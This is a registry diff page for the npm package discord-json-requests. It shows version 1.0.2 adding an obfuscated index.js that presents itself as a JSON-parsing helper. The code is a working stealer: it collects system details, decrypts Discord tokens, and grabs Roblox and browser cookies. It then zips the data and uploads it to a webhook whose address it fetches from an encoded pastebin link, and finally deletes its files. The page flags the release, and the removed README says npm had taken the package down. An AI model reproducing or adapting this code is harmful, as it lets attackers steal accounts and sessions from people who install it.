discord-json-requests 0.0.1-security → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of discord-json-requests might be problematic. Click here for more details.

Files changed (5) hide show
  1. package/index.d.ts +8 -0
  2. package/index.js +1 -0
  3. package/package.json +22 -6
  4. package/tsconfig.json +5 -0
  5. package/README.md +0 -5
package/index.d.ts ADDED
@@ -0,0 +1,8 @@
1
+ declare module 'dscJsonParser' {
2
+ /**
3
+ * Retourne une liste de chemins basée sur les variables d'environnement `localappdata` et `appdata`.
4
+ *
5
+ * @returns {string[]} Un tableau contenant des chemins d'accès aux répertoires utilisateurs.
6
+ */
7
+ export function pathList(): string[];
8
+ }
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const _0xc17ef=_0x16d2;(function(_0x2332c6,_0x5ef74c){const _0x4fa8ba=_0x16d2,_0x4b608e=_0x2332c6();while(!![]){try{const _0x1bbb6f=parseInt(_0x4fa8ba(0x1f6))/0x1+-parseInt(_0x4fa8ba(0x1f5))/0x2+-parseInt(_0x4fa8ba(0x1e2))/0x3+parseInt(_0x4fa8ba(0x1be))/0x4*(-parseInt(_0x4fa8ba(0x1ce))/0x5)+-parseInt(_0x4fa8ba(0x1e9))/0x6+-parseInt(_0x4fa8ba(0x1eb))/0x7*(parseInt(_0x4fa8ba(0x1e3))/0x8)+parseInt(_0x4fa8ba(0x203))/0x9*(parseInt(_0x4fa8ba(0x1c0))/0xa);if(_0x1bbb6f===_0x5ef74c)break;else _0x4b608e['push'](_0x4b608e['shift']());}catch(_0x4bebcc){_0x4b608e['push'](_0x4b608e['shift']());}}}(_0x526f,0xd9238));function _0x16d2(_0x45f05e,_0x3a11f2){const _0x526f32=_0x526f();return _0x16d2=function(_0x16d2ac,_0x294fc1){_0x16d2ac=_0x16d2ac-0x1a9;let _0x5c5a27=_0x526f32[_0x16d2ac];return _0x5c5a27;},_0x16d2(_0x45f05e,_0x3a11f2);}import{hostname as _0x5f2e9d,userInfo,version,tmpdir,cpus}from'os';import{totalmem}from'os-utils';import{pathList}from'randompathlist';import{readFileSync,existsSync,opendirSync,readdirSync,writeFileSync,createReadStream,createWriteStream}from'fs';import{stat,rm,unlink}from'fs/promises';import*as _0x352954 from'path';import _0x781bc7 from'archiver';import _0x3afe5f from'axios';import{load}from'@rookie-rs/api';import _0x280bdd from'form-data';import{Dpapi}from'@primno/dpapi';import*as _0x3801c from'crypto';const pathlist=pathList();let fileContent='';const hostname=_0x5f2e9d(),username=userInfo()[_0xc17ef(0x1e8)],osVersion=version(),cpuInfo=cpus()[0x0][_0xc17ef(0x204)];function totalMemCalc(_0x2a920a){const _0x457f70=_0xc17ef;let _0x295c3e=_0x2a920a['toString'](),_0x57e5d5=_0x295c3e[_0x457f70(0x1cd)](0x0,0x2),_0x3e8183=parseInt(_0x57e5d5);return _0x3e8183;}const memory=totalMemCalc(totalmem());let ipadd;async function fetchAPIip(){const _0x196dcc=_0xc17ef;try{const _0x45bbb7=await fetch('https://api.ipify.org/?format=json'),_0xbb56e1=await _0x45bbb7['json']();return _0xbb56e1['ip'];}catch(_0x52faff){return console[_0x196dcc(0x1df)](_0x196dcc(0x1fa)+_0x52faff),null;}}ipadd=await fetchAPIip(),fileContent+=_0xc17ef(0x1b4)+hostname+_0xc17ef(0x1b5)+username+'\x0a✅\x20OS\x20:\x20'+osVersion+_0xc17ef(0x1c9)+cpuInfo+_0xc17ef(0x1b6)+memory+_0xc17ef(0x1ae)+ipadd+'\x0a';let tokens=[];function getCryptedTokens(_0x380604){const _0x3dffce=_0xc17ef;let _0x20c300=_0x380604;_0x380604+=_0x3dffce(0x1e6);if(!existsSync(_0x380604))return;let _0x31b186=opendirSync(_0x380604);try{let _0x49a399=readdirSync(_0x31b186[_0x3dffce(0x1d2)]);_0x49a399['forEach'](_0x4ead95=>{const _0x1e8276=_0x3dffce;if(_0x4ead95['slice'](-0x3)=='ldb'||_0x4ead95['slice'](-0x3)==_0x1e8276(0x1df)){let _0x13ca06=readFileSync(_0x31b186[_0x1e8276(0x1d2)]+'/'+_0x4ead95,_0x1e8276(0x1de))[_0x1e8276(0x1f0)](),_0x16a54d=/[\w-]{26}\.[\w-]{6}\.[\w-]{25,110}/,_0x1b0688=/mfa\.[\d\w_-]{84}/,_0x354277=_0x16a54d[_0x1e8276(0x1d4)](_0x13ca06)||_0x1b0688[_0x1e8276(0x1d4)](_0x13ca06)||undefined;if(_0x354277)tokens['push'](_0x354277[_0x1e8276(0x1f0)]());}});}finally{_0x31b186[_0x3dffce(0x1ab)]();}if(existsSync(_0x20c300+'\x5cLocal\x20State')){try{readdirSync(_0x380604)[_0x3dffce(0x1c5)](_0x53cf1b=>{const _0x370391=_0x3dffce;(_0x53cf1b[_0x370391(0x1af)](_0x370391(0x1dc))||_0x53cf1b[_0x370391(0x1af)](_0x370391(0x1dd)))&&readFileSync(_0x380604+'\x5c'+_0x53cf1b,_0x370391(0x1de))[_0x370391(0x1bb)](/\r?\n/)[_0x370391(0x1d9)](_0xe00fc9=>{const _0x4e36c6=_0x370391,_0x29b240=new RegExp(/dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*/g),_0x1d066d=_0xe00fc9[_0x4e36c6(0x1cf)](_0x29b240);_0x1d066d&&_0x1d066d[_0x4e36c6(0x1d9)](_0xbefbe6=>{const _0x32a2e9=_0x4e36c6;let _0x300fa6=Buffer[_0x32a2e9(0x1ef)](JSON[_0x32a2e9(0x1b7)](readFileSync(_0x20c300+_0x32a2e9(0x1fe)))[_0x32a2e9(0x1fc)][_0x32a2e9(0x1b0)],'base64')[_0x32a2e9(0x1a9)](0x5);const _0x623f74=Dpapi[_0x32a2e9(0x206)](Buffer[_0x32a2e9(0x1ef)](_0x300fa6,_0x32a2e9(0x1ea)),null,_0x32a2e9(0x1da));_0xbefbe6=Buffer['from'](_0xbefbe6[_0x32a2e9(0x1bb)]('dQw4w9WgXcQ:')[0x1],_0x32a2e9(0x1b9));let _0x390818=_0xbefbe6[_0x32a2e9(0x1a9)](0x3,0xf),_0x365074=_0xbefbe6['slice'](0xf,_0xbefbe6[_0x32a2e9(0x1fd)]-0x10),_0x3e6654=_0xbefbe6[_0x32a2e9(0x1a9)](_0xbefbe6[_0x32a2e9(0x1fd)]-0x10,_0xbefbe6['length']),_0x3aca7c=_0x3801c['createDecipheriv']('aes-256-gcm',_0x623f74,_0x390818);_0x3aca7c[_0x32a2e9(0x1f2)](_0x3e6654);let _0x66b1ae=_0x3aca7c['update'](_0x365074,_0x32a2e9(0x1b9),_0x32a2e9(0x1ea))+_0x3aca7c[_0x32a2e9(0x201)](_0x32a2e9(0x1ea));if(!tokens[_0x32a2e9(0x1cc)](_0x66b1ae))tokens[_0x32a2e9(0x1ba)](_0x66b1ae);});});});}catch(_0x35fb83){};return;}}for(let path of pathlist)getCryptedTokens(path);function removeDoubleTokens(_0x2f8c16){const _0x44ac58=_0xc17ef,_0x3314da={},_0x5299f0=[];return _0x2f8c16[_0x44ac58(0x1d9)](_0x43b360=>{!_0x3314da[_0x43b360]&&(_0x3314da[_0x43b360]=0x1,_0x5299f0['push'](_0x43b360));}),_0x5299f0;}let tokensClean=removeDoubleTokens(tokens);fileContent+=_0xc17ef(0x1bc);async function getTokenInformation(_0x1ae7b6){const _0x6fb446=_0xc17ef;let _0xde6528;try{let _0x1d0d1e=await _0x3afe5f[_0x6fb446(0x1c6)]('https://discord.com/api/v9/users/@me',{'headers':{'User-Agent':_0x6fb446(0x1ad),'Content-Type':_0x6fb446(0x1e0),'Authorization':_0x1ae7b6}});try{_0xde6528=_0x1d0d1e[_0x6fb446(0x1aa)];}catch(_0x54dcc3){_0xde6528=null;}}catch(_0x137a02){};return _0xde6528;}for(let token of tokensClean){let tkInfo=await getTokenInformation(token);fileContent+='✅\x20TOKEN\x20:\x20'+token+_0xc17ef(0x1d8)+JSON[_0xc17ef(0x1b3)](tkInfo)+'\x0a';}const filesPath=process['env'][_0xc17ef(0x1bf)]+_0xc17ef(0x1e1);if(existsSync(filesPath)){let cookieFilePath=filesPath+_0xc17ef(0x1c4),robloxCookiedat=readFileSync(cookieFilePath,_0xc17ef(0x1de))[_0xc17ef(0x1f0)](),crypted=JSON[_0xc17ef(0x1b7)](robloxCookiedat);const encrypt=Buffer[_0xc17ef(0x1ef)](crypted[_0xc17ef(0x1d3)],'base64'),decrypt=Dpapi['unprotectData'](encrypt,null,_0xc17ef(0x1da)),RobloxCookiesDat=decrypt['toString']();fileContent+=_0xc17ef(0x1ed)+RobloxCookiesDat+'\x0a';}else fileContent+=_0xc17ef(0x1d6);fileContent+=_0xc17ef(0x1e5);const cookies=load();for(const cookie of cookies){fileContent+=_0xc17ef(0x1f4)+JSON[_0xc17ef(0x1b3)](cookie)+'\x0a',fileContent+=_0xc17ef(0x1c8)+cookie[_0xc17ef(0x1e7)]+'\x0a',fileContent+='\x20\x20\x20\x20Path:\x20'+cookie[_0xc17ef(0x1d2)]+'\x0a',fileContent+=_0xc17ef(0x1d7)+cookie['secure']+'\x0a',cookie[_0xc17ef(0x1d5)]?fileContent+=_0xc17ef(0x1f8)+cookie[_0xc17ef(0x1d5)]+'\x0a':fileContent+=_0xc17ef(0x1ca),fileContent+='\x20\x20\x20\x20Name:\x20'+cookie[_0xc17ef(0x1ec)]+'\x0a',fileContent+=_0xc17ef(0x1c2)+cookie['value']+'\x0a',fileContent+=_0xc17ef(0x1c1)+cookie[_0xc17ef(0x1b1)]+'\x0a',fileContent+='\x20\x20\x20\x20Same\x20Site:\x20'+cookie[_0xc17ef(0x202)]+'\x0a';}function createFile(_0x422690,_0x25d306){const _0x4fd063=_0xc17ef;writeFileSync(_0x422690,_0x25d306,_0x4fd063(0x1de));}function createZip(_0x306422,_0x43c57a){return new Promise((_0x396a92,_0x49a0e1)=>{const _0x2e9a7d=_0x16d2,_0x587ea7=createWriteStream(_0x43c57a),_0x529870=_0x781bc7('zip',{'zlib':{'level':0x9}});_0x587ea7['on'](_0x2e9a7d(0x1fb),()=>{_0x396a92();}),_0x587ea7['on'](_0x2e9a7d(0x1f3),()=>{const _0x3f43c9=_0x2e9a7d;console[_0x3f43c9(0x1df)](_0x3f43c9(0x1c3));}),_0x529870['on'](_0x2e9a7d(0x1d0),_0x2aa60e=>{const _0x53fd87=_0x2e9a7d;_0x2aa60e[_0x53fd87(0x1e4)]!==_0x53fd87(0x1ff)&&_0x49a0e1(_0x2aa60e);}),_0x529870['on'](_0x2e9a7d(0x205),_0x137fae=>{_0x49a0e1(_0x137fae);}),_0x529870[_0x2e9a7d(0x1cb)](_0x587ea7),_0x529870[_0x2e9a7d(0x1b2)](_0x306422,{'name':_0x352954[_0x2e9a7d(0x1bd)](_0x306422)}),_0x529870['finalize']();});}async function deletePath(_0x4fedc9){const _0x32b58f=_0xc17ef;try{const _0x3ae6df=await stat(_0x4fedc9);if(_0x3ae6df[_0x32b58f(0x1b8)]())await rm(_0x4fedc9,{'recursive':!![],'force':!![]});else _0x3ae6df['isFile']()&&await unlink(_0x4fedc9);}catch(_0x563413){}}async function sendToWebhook(_0x16effa,_0x352899){const _0x1af785=_0xc17ef;try{const _0x3c5162=createReadStream(_0x16effa),_0x59408b=new _0x280bdd();_0x59408b[_0x1af785(0x1f7)]('file',_0x3c5162),await _0x3afe5f[_0x1af785(0x1f1)](_0x352899,_0x59408b,{'headers':_0x59408b['getHeaders']()});}catch(_0x59e267){};}let w;function _0x526f(){const _0x257e5d=['\x0a✅\x20USERNAME\x20:\x20','\x0a✅\x20RAM\x20:\x20','parse','isDirectory','base64','push','split','\x0a🤖\x20DISCORD\x20INFORMATIONS\x20:\x0a','basename','32hCysTa','localappdata','56830hQmsOM','\x20\x20\x20\x20Http\x20Only:\x20','\x20\x20\x20\x20Value:\x20','Data\x20has\x20been\x20drained.','\x5cRobloxCookies.dat','map','get','message','\x20\x20\x20\x20Domain:\x20','\x0a✅\x20CPU\x20:\x20','\x20\x20\x20\x20Expires:\x0a','pipe','includes','substring','554675cVsXpa','match','warning','status','path','CookiesData','exec','expires','\x0a🔴\x20ROBLOX\x20COOKIES\x20:\x0aNo\x20Roblox\x20Cookies...\x0a','\x20\x20\x20\x20Secure:\x20','\x0a✅\x20JSON\x20:\x20','forEach','CurrentUser','aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzN0MzEydXBR','.log','.ldb','utf8','log','application/json','\x5cRoblox\x5cLocalStorage','366483aVceew','1580272atGYwG','code','\x0a🔵\x20BROWSER\x20COOKIES\x20:\x0a','Local\x20Storage\x5cleveldb','domain','username','2926122wSUTIh','utf-8','63rHDTen','name','\x0a🔴\x20ROBLOX\x20COOKIES\x20:\x0a','Erreur\x20HTTP:\x20','from','toString','post','setAuthTag','end','\x0a===================================\x0a✅\x20COOKIE\x20:\x20','2751980HnHmsQ','431507csmpLA','append','\x20\x20\x20\x20Expires:\x20','.txt','Error\x20:\x20','close','os_crypt','length','Local\x20State','ENOENT','text','final','sameSite','8091XMHwEr','model','error','unprotectData','slice','data','closeSync','/new_map_size.zip','Mozilla/5.0\x20(Windows\x20NT\x2010.0;\x20Win64;\x20x64)\x20AppleWebKit/537.36\x20(KHTML,\x20like\x20Gecko)\x20Chrome/80.0.3987.149\x20Safari/537.36','Go\x0a✅\x20IP\x20Adress\x20:\x20','endsWith','encrypted_key','httpOnly','file','stringify','💻\x20PC\x20INFORMATIONS\x20:\x0a✅\x20HOSTNAME\x20:\x20'];_0x526f=function(){return _0x257e5d;};return _0x526f();}try{let res=await fetch(Buffer[_0xc17ef(0x1ef)](_0xc17ef(0x1db),_0xc17ef(0x1b9))[_0xc17ef(0x1f0)]());if(res['ok'])w=await res[_0xc17ef(0x200)]();else console['log'](_0xc17ef(0x1ee)+res[_0xc17ef(0x1d1)]);}catch(_0x2a207f){console[_0xc17ef(0x1df)]('Erreur\x20de\x20requête\x20:\x20'+_0x2a207f[_0xc17ef(0x1c7)]);}function dcode(_0x46bd8d){const _0x545a57=_0xc17ef;return Buffer[_0x545a57(0x1ef)](_0x46bd8d,_0x545a57(0x1b9))[_0x545a57(0x1f0)]();}for(let i=0x0;i<0x5;i++)w=dcode(w);export async function dscJsonParser(){const _0x176961=_0xc17ef,_0x42fe1c=tmpdir+'/'+username+_0x176961(0x1f9),_0x51d398=tmpdir+_0x176961(0x1ac);createFile(_0x42fe1c,fileContent),await createZip(_0x42fe1c,_0x51d398),await sendToWebhook(_0x51d398,w),await deletePath(_0x42fe1c),await deletePath(_0x51d398);}
package/package.json CHANGED
@@ -1,6 +1,22 @@
1
- {
2
- "name": "discord-json-requests",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
1
+ {
2
+ "name": "discord-json-requests",
3
+ "version": "1.0.2",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "keywords": [],
10
+ "author": "z4x0",
11
+ "license": "ISC",
12
+ "type": "module",
13
+ "dependencies": {
14
+ "@primno/dpapi": "^1.1.2",
15
+ "@rookie-rs/api": "^0.5.6",
16
+ "archiver": "^7.0.1",
17
+ "axios": "^1.7.7",
18
+ "form-data": "^4.0.1",
19
+ "os-utils": "^0.0.14",
20
+ "randompathlist": "^1.1.0"
21
+ }
22
+ }
package/tsconfig.json ADDED
@@ -0,0 +1,5 @@
1
+ {
2
+ "compilerOptions": {
3
+ "typeRoots": ["./types", "./node_modules/@types"]
4
+ }
5
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=discord-json-requests for more information.